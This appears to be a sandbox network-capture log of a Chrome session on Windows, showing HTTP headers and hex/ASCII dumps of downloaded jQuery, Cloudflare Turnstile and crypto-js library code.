                                                                                                                                                                                                                                                2024-12-20 15:46:01 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                2024-12-20 15:46:02 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                                                                                                                                Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                                                                                                                                2024-12-20 15:46:02 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                                Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                                                                                                                                2024-12-20 15:46:02 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                                                                                                                                                Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                                                                                                                                2024-12-20 15:46:02 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                                                                                                                                Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                                                                                                                                                2024-12-20 15:46:02 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                                                                                                                                Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                53192.168.2.1149875104.18.95.414436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC648OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                Referer: https://oksu.ertanduzu.ru/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:03 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 47692
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                                last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                                                                                                                                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f50c352ee5842e3-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                                Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                                                                Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                                                                                                                                                                Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                                                                                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                                                                                                                                                                Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                                                                                                                                                                                Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                                                                                                                                                                                                Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                                                                                                                                                                                Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                                                                                                                                                                                Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                                                                                                                                                                                Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                54192.168.2.1149876104.17.24.144436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                                Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:46:03 UTC958INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:46:03 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                ETag: W/"61182885-40eb"
                                                                                                                                                                                                                                                Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                                                                                                                                cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                Age: 165418
                                                                                                                                                                                                                                                Expires: Wed, 10 Dec 2025 15:46:03 GMT
